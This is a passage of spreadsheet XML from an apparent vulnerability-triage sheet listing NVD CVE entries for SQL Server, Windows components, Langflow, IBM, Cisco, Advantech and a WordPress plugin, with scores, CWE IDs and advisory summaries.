      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K174" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr"/>
      <c r="Q174" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67370</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67373</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K175" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr"/>
      <c r="Q175" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67373</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67380</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K176" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L176" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr"/>
      <c r="Q176" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67380</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67381</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K177" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L177" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr"/>
      <c r="Q177" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67381</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67384</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K178" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L178" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr"/>
      <c r="Q178" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67384</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67385</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K179" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L179" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr"/>
      <c r="Q179" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>Use after free in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67385</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67388</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K180" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L180" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr"/>
      <c r="Q180" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67388</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69860</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K181"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81" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr"/>
      <c r="Q181" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69860</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70203</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K182"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82" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr"/>
      <c r="Q182" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70203</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71336</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K183" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L183" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr"/>
      <c r="Q183" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Work Folder Service allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71336</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73173</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="inlineStr"/>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr"/>
      <c r="Q184" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-306: Missing Authentication for Critical Function vulnerability in the edgserver management protocol of Advantech EKI-1242EIMS in firmware version V1.06.01 that allows a remote unauthenticated attacker to invoke critical device-management functions, including network reconfiguration, reboot, reset, and firmware upgrade, by sending crafted requests to TCP port 5058.</t>
        </is>
      </c>
      <c r="S184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73173</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75624</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr">
        <is>
          <t>ibm:aix, ibm:app_connect_enterprise, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L185" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr"/>
      <c r="Q185" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.27 could allow a remote authenticated attacker to bypass security restrictions due to incorrect authorization.</t>
        </is>
      </c>
      <c r="S185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75624</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76059</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr"/>
      <c r="K186" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L186" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr"/>
      <c r="Q186" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 An attacker who could submit custom component source code could bypass the static security scanner by crafting an annotated class-body assignment that resolved to a dangerous callable through alias tracking; the resolved value was never checked against the dangerous callable blocklist due to the logic error. If the crafted component reached the runtime execution path, the attacker could cause arbitrary operating system commands to execute on the server in-process, with the privileges of the running service.</t>
        </is>
      </c>
      <c r="S186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76059</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76409</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="inlineStr"/>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr"/>
      <c r="Q187" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Nexus Dashboard engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-76409 are related to improper limitation of a pathname issues that are grouped under the Common Weakness Enumeration (CWE) CWE-22.</t>
        </is>
      </c>
      <c r="S187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76409</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77495</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K188"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88" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr"/>
      <c r="Q188" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77495</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78088</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr"/>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr"/>
      <c r="Q189" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>The Contest Gallery – Upload &amp; Vote Photos, Media, Sell with PayPal &amp; Stripe plugin for WordPress is vulnerable to Unauthenticated Arbitrary File Overwrite in all versions up to, and including, 32.0.1 due to insufficient file path validation in the 'baseUrlForFacebook' parameter. This makes it possible for authenticated attackers, with subscriber-level access and above, to overwrite known files which may lead to remote code execution when certain preconditions are met.</t>
        </is>
      </c>
      <c r="S189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78088</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78569</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr"/>
      <c r="K190" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr"/>
      <c r="Q190" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow an authenticated attacker to execute arbitrary code due to an incomplete denylist in the security scanner.</t>
        </is>
      </c>
      <c r="S190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78569</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78571</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
